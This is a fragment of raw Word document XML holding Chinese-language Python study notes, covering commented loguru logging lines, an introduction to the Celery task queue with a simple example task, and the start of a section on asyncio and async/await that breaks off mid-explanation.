      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.add(path_log_info, level="INFO",filter=lambda x: 'INFO' in str(x['level']).upper())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498449F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.add(path_log_error, level="INFO",filter=lambda x: 'ERROR' in str(x['level']).upper())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73158C0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAA9EF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>删除向日志文件中记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A17E9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># trace = logger.add('runtime.log')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468323CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># logger.remove(trace)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001565A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBF1C47" w14:textId="77777777" w:rsidR="00F74EF0" w:rsidRDefault="00F74EF0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777EA2D3" w14:textId="43E237F1" w:rsidR="00F74EF0" w:rsidRDefault="00981958" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="533" w:name="_Toc159779970"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布式异步：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cele</w:t>
      </w:r>
      <w:r>
        <w:t>ry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="533"/>
    </w:p>
    <w:p w14:paraId="2C8340D2" w14:textId="77777777" w:rsidR="00F74EF0" w:rsidRDefault="00F74EF0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7362ED8D" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Celery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个开源的分布式任务队列系统，它可以让你在多台机器上执行并发的工作。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Celery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用消息传递来实现分布式的任务队列。任务可以执行异步（在后台）或同步（等待任务完成）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354038ED" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD4BBED" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Celery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要用于处理后台任务，特别是那些需要很长时间来完成的任务。例如，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Celery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来处理大量的数据库查询、发送电子邮件、处理图片或视频等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3A7F84" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E3AADB6" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Celery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写的，支持多种消息代理（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> RabbitMQ, Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），也支持多种结果存储系统（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> AMQP, Redis, MongoDB, SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Celery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的接口简洁易用，可以很好地和现有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目集成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C271940" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB6952C" w14:textId="271AA5F4" w:rsidR="00981958" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>下面是一个简单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Celery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455E80E5" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRPr="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>from celery import Celery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5583B598" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRPr="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38DA7158" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRPr="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> Celery </w:t>
      </w:r>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>实例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3B10BD" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRPr="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>app = Celery('my_app', broker='pyamqp://guest@localhost//')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FDFF5A" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRPr="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3639C742" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRPr="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> Celery </w:t>
      </w:r>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> task </w:t>
      </w:r>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>装饰器定义一个任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619E0538" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRPr="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>@app.task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063B11CF" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRPr="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>def add(x, y):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B679948" w14:textId="2326EB39" w:rsidR="00F74EF0" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    return x + y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBFA4DB" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个例子中，我们定义了一个名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Celery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务，这个任务接受两个参数，返回它们的和。这个任务可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Celery worker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程中异步执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F244145" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE10C6E" w14:textId="6CE8DA7E" w:rsidR="00F74EF0" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要执行这个任务，你可以在你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码中这样调用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D7D7A" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRPr="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> delay </w:t>
      </w:r>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>方法异步执行任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233E1884" w14:textId="22436C97" w:rsidR="00F74EF0" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00973BD1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>result = add.delay(4, 6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF94422" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">delay </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法是一个方便的方式来异步执行任务。这个方法将任务放入消息队列中，然后立即返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> AsyncResult </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象。你可以使用这个对象来查询任务的状态或获取任务的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B7B03B" w14:textId="77777777" w:rsidR="00973BD1" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3514C9E9" w14:textId="05F0A626" w:rsidR="00F74EF0" w:rsidRDefault="00973BD1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Celery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的强大之处在于它的分布式特性和灵活性。你可以在多台机器上运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Celery worker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后在这些机器上分布式地执行任务。你还可以根据任务的类型和优先级来配置任务的路由和调度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627489EF" w14:textId="77777777" w:rsidR="000016EE" w:rsidRDefault="000016EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E789646" w14:textId="77777777" w:rsidR="000016EE" w:rsidRDefault="000016EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE99952" w14:textId="6A557F41" w:rsidR="003C6260" w:rsidRPr="003C6260" w:rsidRDefault="001F626E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="534" w:name="_Toc159779971"/>
      <w:r w:rsidRPr="006501B1">
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00D127A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异步</w:t>
      </w:r>
      <w:r w:rsidR="00205C30">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、携程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="534"/>
    </w:p>
    <w:p w14:paraId="29CEEC1B" w14:textId="4E7FAFC6" w:rsidR="00D127A1" w:rsidRPr="00736FEC" w:rsidRDefault="00736FEC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736FEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>注意，通常我们代码中基本不会使用到异步。使用异步</w:t>
      </w:r>
      <w:r w:rsidRPr="00736FEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>async-await</w:t>
      </w:r>
      <w:r w:rsidRPr="00736FEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的原因，是由于底层代码设计就是异步的，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00736FEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>httpx</w:t>
      </w:r>
      <w:r w:rsidRPr="00736FEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00736FEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00736FEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00736FEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>访问网页，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00736FEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="00736FEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中底层就是异步设计。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D75885" w14:textId="77777777" w:rsidR="00736FEC" w:rsidRDefault="00736FEC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D293503" w14:textId="0136CFA4" w:rsidR="008C3F34" w:rsidRDefault="008C3F34" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中用于定义和处理异步操作的关键字。下面是它们的使用方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874AAD9" w14:textId="31DEA2D0" w:rsidR="008C3F34" w:rsidRDefault="008C3F34" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00810830">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r w:rsidRPr="00810830">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：将一个函数标记为异步函数。</w:t>
      </w:r>
      <w:r w:rsidRPr="002555FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>异步函数可以包含</w:t>
      </w:r>
      <w:r w:rsidRPr="002555FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidRPr="002555FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关键字，</w:t>
      </w:r>
      <w:r w:rsidR="00A05F02" w:rsidRPr="00810830">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r w:rsidRPr="002555FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以在函数内部等待其他异步操作完成，而不会阻塞程序的执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECAF4FC" w14:textId="77777777" w:rsidR="008C3F34" w:rsidRDefault="008C3F34" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00810830">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidRPr="00810830">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
